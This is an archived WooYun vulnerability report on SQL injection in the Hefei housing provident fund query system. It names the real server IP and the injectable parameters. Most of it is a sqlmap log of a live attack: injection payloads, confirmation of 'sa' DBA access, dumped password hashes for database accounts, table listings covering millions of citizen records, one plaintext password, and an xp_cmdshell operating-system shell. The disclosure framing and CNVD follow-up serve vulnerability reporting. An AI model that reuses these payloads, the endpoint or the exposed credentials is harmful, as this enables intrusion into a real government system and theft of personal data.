乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
已经有洞主提交过了,但在该地址中还有另一个参数同样存在SQL注入,而且洞主提交的还依旧没有修复,被利用迟早的事情!~~~
WooYun: 合肥市住房公积金查询系统存在post注入(可系统交互shell/影响公积金用户) 还有一个参数存在注入,洞主提交的还没有修复,利用依旧可以!~~~抓包
http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp (POST)zgyhzh=1&xm=2&sjhm=3
[17:02:53] [INFO] parsing HTTP request from 'E:\8.txt'[17:02:53] [INFO] testing connection to the target URL[17:02:53] [INFO] testing if the target URL is stable. This can take a couple of secondsyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y[17:02:57] [INFO] target URL is stable[17:02:57] [INFO] testing if POST parameter 'zgyhzh' is dynamic[17:02:57] [WARNING] POST parameter 'zgyhzh' does not appear dynamic[17:02:57] [WARNING] heuristic (basic) test shows that POST parameter 'zgyhzh' might not be injectable[17:02:57] [INFO] testing for SQL injection on POST parameter 'zgyhzh'[17:02:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[17:02:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[17:03:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[17:03:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[17:03:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[17:03:02] [INFO] testing 'MySQL inline queries'[17:03:02] [INFO] testing 'PostgreSQL inline queries'[17:03:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[17:03:03] [INFO] testing 'Oracle inline queries'[17:03:03] [INFO] testing 'SQLite inline queries'[17:03:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'[17:03:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[17:03:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[17:03:16] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[17:03:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[17:03:26] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable[17:03:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[17:03:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[17:03:27] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[17:03:27] [INFO] target URL appears to have 9 columns in query[17:03:29] [INFO] POST parameter 'zgyhzh' is 'Generic UNION query (NULL) - 1 to20 columns' injectablePOST parameter 'zgyhzh' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y[17:03:31] [INFO] testing if POST parameter 'xm' is dynamic[17:03:31] [WARNING] POST parameter 'xm' does not appear dynamic[17:03:31] [WARNING] heuristic (basic) test shows that POST parameter 'xm' might not be injectable[17:03:31] [INFO] testing for SQL injection on POST parameter 'xm'[17:03:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[17:03:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[17:03:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[17:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[17:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[17:03:38] [INFO] testing 'MySQL inline queries'[17:03:38] [INFO] testing 'PostgreSQL inline queries'[17:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[17:03:38] [INFO] testing 'Oracle inline queries'[17:03:38] [INFO] testing 'SQLite inline queries'[17:03:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'[17:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[17:03:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[17:03:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[17:03:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[17:03:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[17:03:44] [INFO] testing 'Oracle AND time-based blind'[17:03:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[17:03:58] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)[17:04:12] [INFO] testing 'Generic UNION query (77) - 1 to 10 columns'[17:04:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'[17:04:12] [WARNING] applying generic concatenation with double pipes ('||')[17:04:28] [WARNING] POST parameter 'xm' is not injectable[17:04:28] [INFO] testing if POST parameter 'sjhm' is dynamic[17:04:28] [WARNING] POST parameter 'sjhm' does not appear dynamic[17:04:29] [WARNING] heuristic (basic) test shows that POST parameter 'sjhm' might not be injectable[17:04:29] [INFO] testing for SQL injection on POST parameter 'sjhm'[17:04:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[17:04:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[17:04:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[17:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[17:04:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[17:04:34] [INFO] testing 'MySQL inline queries'[17:04:34] [INFO] testing 'PostgreSQL inline queries'[17:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[17:04:34] [INFO] testing 'Oracle inline queries'[17:04:34] [INFO] testing 'SQLite inline queries'[17:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'[17:04:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[17:04:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[17:04:47] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[17:04:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[17:04:57] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable[17:04:57] [INFO] testing 'Generic UNION query (77) - 1 to 20 columns'[17:04:58] [INFO] POST parameter 'sjhm' is 'Generic UNION query (77) - 1 to 20 columns' injectablePOST parameter 'sjhm' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] ysqlmap identified the following injection points with a total of 478 HTTP(s) requests:---Place: POSTParameter: zgyhzh Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: zgyhzh=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(119)+CHAR(118)+CHAR(110)+CHAR(113)+CHAR(66)+CHAR(104)+CHAR(78)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR(118)+CHAR(111)+CHAR(104)+CHAR(99)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &xm=2&sjhm=3 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: zgyhzh=1'; WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: zgyhzh=1' WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3Place: POSTParameter: sjhm Type: UNION query Title: Generic UNION query (77) - 9 columns Payload: zgyhzh=1&xm=2&sjhm=3' UNION ALL SELECT 77,77,CHAR(113)+CHAR(119)+CHAR(118)+CHAR(110)+CHAR(113)+CHAR(86)+CHAR(77)+CHAR(112)+CHAR(67)+CHAR(99)+CHAR(74)+CHAR(70)+CHAR(100)+CHAR(86)+CHAR(83)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113),77,77,77,77,77,77-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: zgyhzh=1&xm=2&sjhm=3'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: zgyhzh=1&xm=2&sjhm=3' WAITFOR DELAY '0:0:5'-----there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: zgyhzh, type: Single quoted string (default)[1] place: POST, parameter: sjhm, type: Single quoted string[q] Quit> 0[17:05:13] [INFO] testing Microsoft SQL Server[17:05:14] [INFO] confirming Microsoft SQL Server[17:05:15] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: Apache 2.2.22, JSPback-end DBMS: Microsoft SQL Server 2000[17:08:11] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: Apache 2.2.22, JSPback-end DBMS: Microsoft SQL Server 2000[17:08:11] [INFO] fetching current useryou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ycurrent user: 'sa'[17:08:14] [INFO] fetching current databasecurrent database: 'hfgjj'[17:08:14] [INFO] testing if current user is DBAcurrent user is DBA: TrueDBA权限there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: sjhm, type: Single quoted string (default)[1] place: POST, parameter: zgyhzh, type: Single quoted string[q] Quit> 1[17:09:10] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: Apache 2.2.22, JSPback-end DBMS: Microsoft SQL Server 2000[17:09:10] [INFO] fetching current databasecurrent database: 'hfgjj'[17:09:10] [INFO] fetching database users[17:09:10] [INFO] the SQL query used returns 4 entries[17:09:10] [INFO] starting 4 threads[17:09:10] [INFO] resumed: "12329"[17:09:10] [INFO] resumed: "sa"[17:09:10] [INFO] resumed: "BUILTIN\\\\Administrators"[17:09:10] [INFO] resumed: "hengke"database management system users [4]:[*] 12329[*] BUILTIN\\Administrators[*] hengke[*] sa[17:09:10] [INFO] fetching database users password hashesyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y[17:09:12] [INFO] the SQL query used returns 5 entries[17:09:12] [INFO] starting 5 threads[17:09:12] [INFO] retrieved: "12329","0x0100f07081700cfaf759e66438ea2f3ba8716...[17:09:13] [INFO] retrieved: " "," "[17:09:13] [INFO] retrieved: "BUILTIN\\\\Administrators"," "[17:09:13] [INFO] retrieved: "hengke","0x0100db4afb45cf379dd1faabfd592a4b6c83...[17:09:13] [INFO] retrieved: "sa","0x0100d341535b397ce619be87c4a2592e80b579c0...do you want to store hashes to a temporary file for eventual further processingwith other tools [y/N] ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] ndatabase management system users password hashes:[*] 12329 [1]: password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e header: 0x0100 salt: f0708170 mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e[*] BUILTIN\\Administrators [1]: password hash: NULL[*] hengke [1]: password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c2775dace3924d902c8041900c6b0df944 header: 0x0100 salt: db4afb45 mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309 uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944[*] sa [1]: password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f250d80f97cd3d5f7c97fcaad96fba05ae header: 0x0100 salt: d341535b mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae[17:10:12] [INFO] the SQL query used returns 7 entries[17:10:12] [INFO] starting 7 threads[17:10:12] [INFO] retrieved: "msdb"[17:10:12] [INFO] retrieved: "hfgjj"[17:10:12] [INFO] retrieved: "master"[17:10:12] [INFO] retrieved: "hengke"[17:10:12] [INFO] retrieved: "gjj"[17:10:12] [INFO] retrieved: "model"[17:10:12] [INFO] retrieved: "tempdb"available databases [7]:[*] gjj[*] hengke[*] hfgjj[*] master[*] model[*] msdb[*] tempdb[17:10:56] [INFO] the SQL query used returns 109 entries[17:10:56] [INFO] starting 10 threads[17:10:56] [INFO] retrieved: "dbo.cms_hdjl"[17:10:56] [INFO] retrieved: "dbo.D99_REG"[17:10:57] [INFO] retrieved: "dbo.advise_upload"[17:10:57] [INFO] retrieved: "dbo.class_supply"[17:10:57] [INFO] retrieved: "dbo.culture_info"[17:10:57] [INFO] retrieved: "dbo.CULTURE_INVESTDETAIL"[17:10:57] [INFO] retrieved: "dbo.dtproperties"[17:10:58] [INFO] retrieved: "dbo.D99_CMD"[17:10:58] [INFO] retrieved: "dbo.DIY_TEMPTALBLE"[17:10:58] [INFO] retrieved: "dbo.h_fangjian"[17:10:58] [INFO] retrieved: "dbo.fellow_link"[17:10:58] [INFO] retrieved: "dbo.culture_replyinfo"[17:10:58] [INFO] retrieved: "dbo.fellow_class"[17:10:58] [INFO] retrieved: "dbo.h_loudong"[17:10:58] [INFO] retrieved: "dbo.fagui"[17:10:58] [INFO] retrieved: "dbo.focus_user"[17:10:59] [INFO] retrieved: "dbo.hdzx"[17:10:59] [INFO] retrieved: "dbo.CULTURE_INVESTED"[17:10:59] [INFO] retrieved: "dbo.D99_Tmp"[17:10:59] [INFO] retrieved: "dbo.join_table"[17:10:59] [INFO] retrieved: "dbo.h_quyu"[17:10:59] [INFO] retrieved: "dbo.mail_material"[17:11:00] [INFO] retrieved: "dbo.INNER_INFO"[17:11:00] [INFO] retrieved: "dbo.kill_kk"[17:11:00] [INFO] retrieved: "dbo.pbcatfmt"[17:11:00] [INFO] retrieved: "dbo.pbcattbl"[17:11:00] [INFO] retrieved: "dbo.pbcatcol"[17:11:01] [INFO] retrieved: "dbo.pbcatvld"[17:11:01] [INFO] retrieved: "dbo.sqlmapoutput"[17:11:01] [INFO] retrieved: "dbo.renyuan_dw"[17:11:01] [INFO] retrieved: "dbo.sys_log"[17:11:01] [INFO] retrieved: "dbo.SYS_MENU"[17:11:02] [INFO] retrieved: "dbo.supply_note"[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"[17:11:02] [INFO] retrieved: "dbo.sys_siteprevilige"[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"[17:11:02] [INFO] retrieved: "dbo.sys_resource"[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"[17:11:03] [INFO] retrieved: "dbo.sys_siteprevilige"[17:11:03] [INFO] retrieved: "dbo.sys_unittype"[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"[17:11:03] [INFO] retrieved: "dbo.SYS_SITERIGHT"[17:11:03] [INFO] retrieved: "dbo.LIFA_NEWS"[17:11:04] [INFO] retrieved: "dbo.sys_userproperty"[17:11:04] [INFO] retrieved: "dbo.pbcatedt"[17:11:04] [INFO] retrieved: "dbo.SYS_USERGROUP"[17:11:04] [INFO] retrieved: "dbo.sys_user_role"[17:11:05] [INFO] retrieved: "dbo.renyuan_dw"[17:11:05] [INFO] retrieved: "dbo.sys_user_role"[17:11:05] [INFO] retrieved: "dbo.sys_user_unit"[17:11:05] [INFO] retrieved: "dbo.tongji"[17:11:05] [INFO] retrieved: "dbo.syssegments"[17:11:05] [INFO] retrieved: "dbo.supply_replynote"[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"[17:11:06] [INFO] retrieved: "dbo.tz_js"[17:11:06] [INFO] retrieved: "dbo.tz_note"[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"[17:11:06] [INFO] retrieved: "dbo.v_09_10_xh"[17:11:06] [INFO] retrieved: "dbo.v_168_dz_old_61"[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"[17:11:07] [INFO] retrieved: "dbo.v_168_dwinfo"[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_61"[17:11:07] [INFO] retrieved: "dbo.v_168_dwdz"[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_65"[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_67"[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_66"[17:11:08] [INFO] retrieved: "dbo.hero_table"[17:11:08] [INFO] retrieved: "dbo.v_168_dz1"[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_68"[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_yl"[17:11:09] [INFO] retrieved: "dbo.v_168_dz2"[17:11:09] [INFO] retrieved: "dbo.v_168_gjd"[17:11:09] [INFO] retrieved: "dbo.v_dw_gzmx"[17:11:09] [INFO] retrieved: "dbo.v_dw_gjmx_old"[17:11:09] [INFO] retrieved: "dbo.v_dwhjqk_old"[17:11:10] [INFO] retrieved: "dbo.v_dwhjqk_old"[17:11:10] [INFO] retrieved: "dbo.v_168_info_old"[17:11:10] [INFO] retrieved: "dbo.v_update_Time"[17:11:10] [INFO] retrieved: "dbo.v_save_etps_password"[17:11:10] [INFO] retrieved: "dbo.v_save_password"[17:11:11] [INFO] retrieved: "dbo.v_168_info_old"[17:11:11] [INFO] retrieved: "dbo.v_web_hdmx"[17:11:11] [INFO] retrieved: "dbo.v_house_info"[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"[17:11:11] [INFO] retrieved: "dbo.v_web_sdqk"[17:11:12] [INFO] retrieved: "dbo.v_web_shgc"[17:11:12] [INFO] retrieved: "dbo.v_dwzz_old"[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx11"[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx10"[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx12"[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"[17:11:13] [INFO] retrieved: "dbo.web_dwinfo"[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"[17:11:13] [INFO] retrieved: "dbo.xzsp_dw"[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx09"[17:11:13] [INFO] retrieved: "dbo.WELFARE_NEWS"[17:11:14] [INFO] retrieved: "dbo.sysconstraints"[17:11:14] [INFO] retrieved: "dbo.zxbs"[17:11:14] [INFO] retrieved: "dbo.zhut"[17:11:15] [WARNING] cannot properly display Unicode characters inside WindowsS command prompt (http://bugs.python.org/issue1602). All unhandled occurancesll result in replacement with '?' character. Please, find proper character repsentation inside corresponding output files.[17:11:15] [INFO] retrieved: "dbo.??"[17:11:15] [INFO] retrieved: "dbo.wenjian"[17:11:15] [INFO] retrieved: "dbo.xzsp_dw"[17:11:15] [INFO] retrieved: "dbo.xzxk"[17:11:16] [INFO] retrieved: "dbo.v_168_dz_old_61"[17:11:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap ising to retry the request[17:11:16] [WARNING] if the problem persists please try to lower the number ofsed threads (option '--threads')[17:11:18] [INFO] retrieved: "dbo.h_loupan"[17:11:18] [INFO] retrieved: "dbo.v_dw_gjmx_old"Database: hfgjj[109 tables]+----------------------+| CULTURE_INVESTDETAIL || CULTURE_INVESTED || D99_CMD || D99_REG || D99_Tmp || DIY_TEMPTALBLE || INNER_INFO || LIFA_NEWS || SYS_MENU || SYS_SITERIGHT || SYS_USERGROUP || WELFARE_NEWS || advise_upload || class_supply || cms_hdjl || culture_info || culture_replyinfo || dtproperties || fagui || fellow_class || fellow_link || focus_user || h_fangjian || h_loudong || h_loupan || h_quyu || hdzx || hero_table || join_table || kill_kk || mail_material || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || renyuan_dw || renyuan_dw || sqlmapoutput || supply_note || supply_replynote || sys_log || sys_resource || sys_role_resource || sys_role_resource || sys_siteprevilige || sys_siteprevilige || sys_unit_role || sys_unit_role || sys_unittype || sys_user_role || sys_user_role || sys_user_unit || sys_userproperty || sysconstraints || syssegments || tongji || tz_js || tz_note || v_09_10_xh || v_168_dwdz || v_168_dwhjqk_old || v_168_dwhjqk_old || v_168_dwinfo || v_168_dwzz_old || v_168_dwzz_old || v_168_dz1 || v_168_dz2 || v_168_dz_old_61 || v_168_dz_old_61 || v_168_dz_old_61 || v_168_dz_old_65 || v_168_dz_old_66 || v_168_dz_old_67 || v_168_dz_old_68 || v_168_dz_old_yl || v_168_gjd || v_168_info_old || v_168_info_old || v_dw_gjmx_old || v_dw_gjmx_old || v_dw_gzmx || v_dwhjqk_old || v_dwhjqk_old || v_dwzz_old || v_house_info || v_save_etps_password || v_save_password || v_update_Time || v_web_hdmx || v_web_hdqk1 || v_web_hdqk1 || v_web_sdqk || v_web_shgc || v_web_wtmx09 || v_web_wtmx10 || v_web_wtmx11 || v_web_wtmx12 || v_web_wttqmx_old || v_web_wttqmx_old || v_web_wttqmx_old || web_dwinfo || wenjian || xzsp_dw || xzsp_dw || xzxk || zhut || zxbs || ?? |+----------------------+Database: hfgjj+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.v_168_dz1 | 7603650 || dbo.v_web_hdmx | 6436608 || dbo.v_dw_gjmx_old | 1220549 || dbo.v_dw_gjmx_old | 1220549 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_save_password | 895507 || dbo.v_web_shgc | 497282 || dbo.v_168_dwhjqk_old | 441669 || dbo.v_168_dwhjqk_old | 441669 || dbo.v_dwhjqk_old | 438713 || dbo.v_dwhjqk_old | 438713 || dbo.v_168_dz_old_yl | 424834 || dbo.v_168_info_old | 374905 || dbo.v_168_info_old | 374905 || dbo.v_web_wtmx12 | 238842 || dbo.v_168_dwzz_old | 165814 || dbo.v_168_dwzz_old | 165814 || dbo.v_168_dz2 | 147125 || dbo.v_web_wtmx10 | 120510 || dbo.v_web_wtmx11 | 89190 || dbo.v_dw_gzmx | 76545 || dbo.v_dwzz_old | 76088 || dbo.v_09_10_xh | 59814 || dbo.v_web_wtmx09 | 34592 || dbo.v_web_hdqk1 | 29389 || dbo.v_web_hdqk1 | 29389 || dbo.sys_log | 24920 || dbo.hdzx | 11659 || dbo.v_168_dwinfo | 10587 || dbo.v_house_info | 9579 || dbo.v_save_etps_password | 7666 || dbo.v_web_sdqk | 4741 || dbo.tongji | 4323 || dbo.web_dwinfo | 3387 || dbo.v_168_dwdz | 1043 || dbo.cms_hdjl | 464 || dbo.SYS_SITERIGHT | 360 || dbo.WELFARE_NEWS | 257 || dbo.sys_role_resource | 192 || dbo.sys_role_resource | 192 || dbo.fagui | 102 || dbo.wenjian | 74 || dbo.supply_note | 69 || dbo.sys_resource | 60 || dbo.sys_user_role | 47 || dbo.sys_user_role | 47 || dbo.xzsp_dw | 39 || dbo.xzsp_dw | 39 || dbo.SYS_MENU | 38 || dbo.mail_material | 34 || dbo.supply_replynote | 34 || dbo.sysconstraints | 34 || dbo.focus_user | 30 || dbo.pbcatcol | 29 || dbo.kill_kk | 21 || dbo.pbcatedt | 21 || dbo.DIY_TEMPTALBLE | 20 || dbo.pbcatfmt | 20 || dbo.CULTURE_INVESTDETAIL | 13 || dbo.D99_CMD | 12 || dbo.hero_table | 12 || dbo.sys_user_unit | 8 || dbo.h_quyu | 7 || dbo.advise_upload | 6 || dbo.xzxk | 6 || dbo.v_168_gjd | 5 || dbo.INNER_INFO | 4 || dbo.renyuan_dw | 4 || dbo.renyuan_dw | 4 || dbo.class_supply | 3 || dbo.sqlmapoutput | 3 || dbo.sys_unittype | 3 || dbo.syssegments | 3 || dbo.zxbs | 3 || dbo.CULTURE_INVESTED | 2 || dbo.D99_Tmp | 2 || dbo.fellow_class | 2 || dbo.fellow_link | 2 || dbo.h_loupan | 2 || dbo.pbcattbl | 2 || dbo.tz_js | 2 || dbo.tz_note | 2 || dbo.D99_REG | 1 || dbo.h_loudong | 1 || dbo.LIFA_NEWS | 1 || dbo.sys_siteprevilige | 1 || dbo.sys_siteprevilige | 1 || dbo.v_update_Time | 1 |+--------------------------+---------+上面数百万的信息可以被泄漏出去!~~~Database: hfgjjTable: v_save_password[1 entry]+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+| sjhm | dxjs | ftime | allIn | dwyhzh | zgyhzh | todayIn | enabled | password |+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+| null | 0 | 12 31 2014 12:58PM | 99 | 888880003 | 800978023 | 9 | NULL | s082812 |+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+[17:21:09] [INFO] fingerprinting the back-end DBMS operating system version andservice pack[17:21:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[17:21:11] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[17:21:13] [INFO] the back-end DBMS operating system is Windows 2000 Service Pack 0[17:21:13] [INFO] testing if current user is DBA[17:21:13] [INFO] checking if xp_cmdshell extended procedure is available, please wait..do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[17:21:33] [INFO] xp_cmdshell extended procedure is available[17:21:33] [INFO] testing if xp_cmdshell extended procedure is usable[17:21:35] [INFO] the SQL query used returns 1 entries[17:21:35] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[17:21:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[17:21:51] [INFO] adjusting time delay to 4 seconds due to good response times[17:22:20] [INFO] xp_cmdshell extended procedure is usable[17:22:20] [INFO] going to use xp_cmdshell extended procedure for operating system command execution[17:22:20] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTERos-shell> ipconfigdo you want to retrieve the command standard output? [Y/n/a] y[17:22:31] [INFO] the SQL query used returns 12 entries[17:22:31] [INFO] starting 10 threads[17:22:32] [INFO] retrieved: 14[17:22:41] [INFO] retrieved:[17:22:46] [INFO] adjusting time delay to 3 seconds due to good response times[17:22:51] [INFO] retrieved: Windows 2000 IP Configuration[17:29:37] [INFO] retrieved:[17:29:45] [INFO] retrieved: Ethernet a
如上
过滤修复,更改权限
危害等级:高
漏洞Rank:10
确认时间:2015-08-19 09:43
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。
暂无